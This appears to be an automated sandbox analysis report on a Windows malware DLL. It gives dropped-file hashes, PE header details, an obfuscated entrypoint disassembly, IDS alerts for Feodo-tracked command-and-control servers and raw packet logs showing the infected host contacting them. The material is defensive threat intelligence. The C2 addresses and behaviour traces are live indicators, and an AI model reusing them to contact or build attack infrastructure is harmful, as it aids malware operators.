                                            SHA-256:D713DA7A135F0A998A57B623B5B5D53F9F81065CE6970BFE378BDD82E82A9636
                                            SHA-512:2C09158BC33D915B3A538DA1BF1B2F3AC8D16F717C0FD2492C9652E1145A18AF8D18A0600CA3A1DBD2B57588707AC622D40393DEF27B7F64B7C30334CA2AB856
                                            Malicious:false
                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD70C.tmp.xml
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4557
                                            Entropy (8bit):4.434761553912698
                                            Encrypted:false
                                            SSDEEP:48:cvIwSD8zsxPJgtWI9Q2WSC8BpQ8fm8M4JOzFy+q8+HiKBKcQIcQwv+sd:uITfPnXSNLtJPMKBKkwv+sd
                                            MD5:B4B5DF27A6276891F7EDA704E31511A9
                                            SHA1:DD63886F51BD8F68506450B7EE879F269AE7CE7E
                                            SHA-256:CC4BBBE761C631D6355A92DF394FDF63F04ABB08134AC653239410F4014269F5
                                            SHA-512:2223BF109F0D1FE61F90381B58769A2E9A34FDC3982C068D1D981B85577E6D9AEE61AD7044D49C1D1F44AC9475BD93707A5BC6B7FDB6A71A21F1F6301A525EA6
                                            Malicious:false
                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="833551" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD98C.tmp.txt
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):13340
                                            Entropy (8bit):2.6942821752607897
                                            Encrypted:false
                                            SSDEEP:96:9GiZYWVhbUmvAT0YKYkW/SHcYEZWjt2i0q8/dwpXsCaE2qCpwIaB3:9jZD7xM0ty2ncCaE2qCpHaB3
                                            MD5:93610FB3EED6557EA9DECB05D8D30CDF
                                            SHA1:8D8FE718630DD53B6A72E48523D487EE0B193E04
                                            SHA-256:A346415DF0EF26CF661FB38F27E6FF762A8191DC339650B528A785980A6A165C
                                            SHA-512:22C212CF62031ADC12E96799FB8F8DA4B6880150B5A19938AB480564A49F9761D6F6B08A8929448F5D8FBA3530D32097F2A0C8F0C62134F4FC20940166451C3D
                                            Malicious:false
                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                            C:\Users\user\AppData\Local\Temp\UPD6720.tmp
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):127008
                                            Entropy (8bit):7.9986248094611545
                                            Encrypted:true
                                            SSDEEP:3072:IaAsM09nSc63+nmGhKZ/b5UhN30+EMPHVLCApUmwLgJfD33EKc:dlSSylKN30+jJUmwafZc
                                            MD5:CA3F18E60AAFFC87EA46A2C8EE6B7209
                                            SHA1:4F573723EF195D62E8B1652C83412480508AF9EE
                                            SHA-256:D8AA5DE3BE3D7CD5BBDC546E2E83BDDA0FE03C867072D29D31EFD24E3DDBAEFB
                                            SHA-512:978B9B8B2C870C7AE8E3370610025EB680D8C4C3020C8ECC2AE74108E81657C5C5B73E4BC839527AC92E69DF24514BBE8D4555DA5AF3C572AA5A04B4C1F2E805
                                            Malicious:false
                                            Preview: ....cE,.w;..$d......*H.8Hh.<...........J....?.[...?._.C;.j.1..O*u.g}z.....b.8.5.A.L..<)>r.V.q ........|2.a..E...}..i,f-.!.`.X........+n..`GB.).4......cn..pD........k..]..-.jt...Q..4....=.=3E.}R(..!c..K.#&.'t...[w.tP%a*(......n.-.I.....Ye..p...../2.H.NS...j.@wh.....^.e.!....`x7...L.z.1".aC.=K.......19{I.....s..z9..<.{.... .....\....{I=...OC.w.Twm......J.....X.!.q.l~#$.U._..K....2Hp......cc{.c.X...A.*..Dk:.w^..v...{.,.......x......O.`i,D..s..J2A..J....%:.....$...!:..0.*.h....@..|..L.r...N..&..J..j.iu......<...k{t{..L.j..|.<YZ.%....;....3.~\e.;..%<|O~WntU.VV.kw...*nh..d...M....7..N=w.f-=..6...Ix4B.j5..Z.."..<., >..C.2..1`W.!.DJxX....r..;.t.;...J.m..q.O1..2..n..L..5O...K..`d*b....p.0.t.O..W...5.l;TZ./,.K..J...Y-q(..8h;...[......A.....y.@y...f_5{...Yv8O4..C..=`S*.!.....0....Dr.t.\..SS.9p...k.].g....7h Z..bBH.a..c.....e...q .KNV^..0...~{z.4.ok.6.ON.'H.;e%.8:..(!7_.$.#...<....$g...J...l......B#...~Jt...l..%.i..1.?.A8.P......*}..|..F..@..
                                            C:\Windows\SysWOW64\Hbjpd\pixmxoo.dll
                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):413696
                                            Entropy (8bit):6.829822686771689
                                            Encrypted:false
                                            SSDEEP:6144:ZU4InnU7o13vsJPAOIlQaumkBdb/2oq0H0HV1LhLpZ1:ZUVU7oFva6l4mkv6oq0UHt1
                                            MD5:9A062EAD5B2D55AF0A5A4B39C5B5EADC
                                            SHA1:FC83367BE87C700A696B0329DAB538B5E47D90BF
                                            SHA-256:A9C68D527223DB40014D067CF4FDAE5BE46CCA67387E9CFDFF118276085F23EF
                                            SHA-512:693AB862C7E3C5DAD3CA3D44BBC4A5A4C2391FF558E02E86E4C1D7D1FA7C00B4ACF1C426CA619DEA2B422997CAAF1F0ECBA37EC0FFCA19EDACA297005C9AD861
                                            Malicious:false
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;...;...;..]...;..].$.;..]...;..8...;..>...;..?...;.......;...:.;.;...2...;...;...;......;.......;...9...;.Rich..;.........PE..L....h.`...........!.........l......Pu....................................................@............................|...l...x........r...................`..H!..@...8...........................x...@............................................text............................... ..`.rdata..............................@..@.data...............................@....rsrc....r.......t..................@..@.reloc..H!...`..."..................@..B................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.349908068883612
                                            TrID:
                                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                            • Generic Win/DOS Executable (2004/3) 0.20%
                                            • DOS Executable Generic (2002/1) 0.20%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:zGeK5so94c.dll
                                            File size:126976
                                            MD5:49fbffd7602b52f05848a6016d42ec89
                                            SHA1:b57bb387a15b3c0e10a236f3861420a9dac980cb
                                            SHA256:1859099c09c69aa811c525e9e70787c49048e3c24814d31ea2a17905cfad9d18
                                            SHA512:a76ddf9480471d43e71904f1d9ec0295877b6dbdbe7012dfaf8b9a745795d3f76579904e3e23ff4d87918f90e4630a66a1cdcdb0640828d451733ccde5222c2c
                                            SSDEEP:3072:0U+7+JpuO2MpbWODrtLnmsh3toybjxI+kUaOBwygs/geK2g:0kJfh0ODxLmsh9nPx7kUaOBxmL
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|."...q...q...q.d\q8..q.deq...q.dgq...qRich...q........................PE..L...[..`...........!...............................

                                            File Icon

                                            Icon Hash:74f0e4ecccdce0e4

                                            Static PE Info

                                            General

                                            Entrypoint:0x100099ef
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x10000000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x600DFE5B [Sun Jan 24 23:10:19 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:

                                            Entrypoint Preview

                                            Instruction
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 14h
                                            mov dword ptr [ebp-14h], 0000E5F9h
                                            add dword ptr [ebp-14h], 00008EABh
                                            add dword ptr [ebp-14h], FFFF801Ah
                                            xor dword ptr [ebp-14h], 00008CB3h
                                            mov dword ptr [ebp-10h], 0000AA3Ah
                                            shl dword ptr [ebp-10h], 10h
                                            add dword ptr [ebp-10h], 0000BAAFh
                                            xor dword ptr [ebp-10h], AA3AE5B5h
                                            mov dword ptr [ebp-0Ch], 000049EDh
                                            xor dword ptr [ebp-0Ch], BE2B1A0Ah
                                            xor dword ptr [ebp-0Ch], B5B2DB37h
                                            add dword ptr [ebp-0Ch], 0000B030h
                                            xor dword ptr [ebp-0Ch], 0B9A17DBh
                                            mov dword ptr [ebp-08h], 0000928Fh
                                            add dword ptr [ebp-08h], FFFF35C3h
                                            add dword ptr [ebp-08h], 0000ABF1h
                                            shl dword ptr [ebp-08h], 0Dh
                                            xor dword ptr [ebp-08h], 0E88022Ch
                                            mov dword ptr [ebp-04h], 0000DBCCh
                                            or dword ptr [ebp-04h], EDF7A08Fh
                                            imul eax, dword ptr [ebp-04h], 4Eh
                                            mov dword ptr [ebp-04h], eax
                                            shr dword ptr [ebp-04h], 0Dh
                                            xor dword ptr [ebp-04h], 000423E2h
                                            dec dword ptr [ebp+0Ch]
                                            jne 00007F05E891641Bh
                                            mov eax, dword ptr [ebp+08h]
                                            mov dword ptr [10020404h], eax
                                            mov eax, dword ptr [ebp-10h]
                                            mov eax, dword ptr [ebp-14h]
                                            call 00007F05E8926A41h
                                            test eax, eax
                                            je 00007F05E8916404h
                                            mov eax, dword ptr [ebp-04h]
                                            mov eax, dword ptr [ebp-08h]
                                            mov eax, dword ptr [ebp-0Ch]
                                            push ecx
                                            push ecx
                                            call 00007F05E891CE03h

                                            Rich Headers

                                            Programming Language:
                                            • [EXP] VS2013 UPD4 build 31101
                                            • [LNK] VS2013 UPD4 build 31101

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x1f0100x47.rdata
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x220000x220.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x1d2ed0x1d400False0.634156316774data6.48467144584IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rdata0x1f0000x570x200False0.130859375data0.777324576667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x200000x10940x400False1.0107421875data7.41707765869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .reloc0x220000x2200x400False0.4375data3.11105732479IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Exports

                                            NameOrdinalAddress
                                            Control_RunDLL10x100043df

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/26/21-12:20:57.094066TCP2404322ET CNC Feodo Tracker Reported CnC Server TCP group 124974580192.168.2.4190.55.186.229
                                            01/26/21-12:21:23.470062TCP2404326ET CNC Feodo Tracker Reported CnC Server TCP group 14497507080192.168.2.4203.157.152.9

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 26, 2021 12:20:57.094065905 CET4974580192.168.2.4190.55.186.229
                                            Jan 26, 2021 12:21:00.101619959 CET4974580192.168.2.4190.55.186.229
                                            Jan 26, 2021 12:21:06.117687941 CET4974580192.168.2.4190.55.186.229
                                            Jan 26, 2021 12:21:23.470062017 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:23.704705954 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:23.704864979 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:23.705459118 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:23.705550909 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:23.940669060 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:23.940699100 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:23.940722942 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:23.940745115 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:23.940761089 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:23.940779924 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.364944935 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.365129948 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.365803957 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.365844965 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.365859032 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.365905046 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.365937948 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.366653919 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.366731882 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.367424965 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.367444992 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.367499113 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.367521048 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.562865019 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.562951088 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.563774109 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.563798904 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.563843012 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.563878059 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.602951050 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.602979898 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.603102922 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.603599072 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.603684902 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.604619980 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.604645014 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.604722023 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.604759932 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.605597973 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.605623007 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.605700970 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.606561899 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.606585026 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.606676102 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.759891033 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.759936094 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.759994030 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.760020018 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.760796070 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.760868073 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.761792898 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.761861086 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.838912964 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.839024067 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.839885950 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.839963913 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.839973927 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.840028048 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.840876102 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.840996027 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.841797113 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.841898918 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.841943979 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.842011929 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.842683077 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.842706919 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.842773914 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.842793941 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.844710112 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.844737053 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.844754934 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.844774008 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.844866037 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.845010996 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.845647097 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.845669985 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.845791101 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.847063065 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.847089052 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.847174883 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.847749949 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.847843885 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.848598003 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.848714113 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.956140041 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.956231117 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.956248999 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:24.956299067 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:24.956334114 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:25.005104065 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:25.005235910 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:25.005775928 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:25.005877972 CET497507080192.168.2.4203.157.152.9
                                            Jan 26, 2021 12:21:25.007337093 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:25.007361889 CET708049750203.157.152.9192.168.2.4
                                            Jan 26, 2021 12:21:25.007457018 CET497507080192.168.2.4203.157.152.9

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 26, 2021 12:20:35.390110970 CET6238953192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:35.449310064 CET53623898.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:36.995995998 CET4991053192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:37.043986082 CET53499108.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:38.132236958 CET5585453192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:38.180073977 CET53558548.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:39.084609032 CET6454953192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:39.132518053 CET53645498.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:40.389422894 CET6315353192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:40.445812941 CET53631538.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:41.395715952 CET5299153192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:41.443586111 CET53529918.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:42.516783953 CET5370053192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:42.572937965 CET53537008.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:43.615274906 CET5172653192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:43.663007975 CET53517268.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:44.573370934 CET5679453192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:44.621242046 CET53567948.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:46.081010103 CET5653453192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:46.129558086 CET53565348.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:47.023570061 CET5662753192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:47.074186087 CET53566278.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:48.591981888 CET5662153192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:48.642694950 CET53566218.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:49.731512070 CET6311653192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:49.787719011 CET53631168.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:50.872119904 CET6407853192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:50.922827005 CET53640788.8.8.8192.168.2.4
                                            Jan 26, 2021 12:20:52.110033035 CET6480153192.168.2.48.8.8.8
                                            Jan 26, 2021 12:20:52.162604094 CET53648018.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:01.933662891 CET6172153192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:01.981584072 CET53617218.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:04.685415030 CET5125553192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:04.746298075 CET53512558.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:22.441669941 CET6152253192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:22.502685070 CET53615228.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:23.426961899 CET5233753192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:23.484947920 CET53523378.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:24.027281046 CET5504653192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:24.085694075 CET53550468.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:24.374958038 CET4961253192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:24.445048094 CET53496128.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:24.501508951 CET4928553192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:24.557856083 CET53492858.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:25.029344082 CET5060153192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:25.088505030 CET53506018.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:25.672364950 CET6087553192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:25.733773947 CET53608758.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:26.361728907 CET5644853192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:26.417849064 CET53564488.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:27.318413019 CET5917253192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:27.377552986 CET53591728.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:28.247395039 CET6242053192.168.2.48.8.8.8
                                            Jan 26, 2021 12:21:28.303975105 CET53624208.8.8.8192.168.2.4
                                            Jan 26, 2021 12:21:28.947252989 CET6057953192.168.2.48.8.8.8
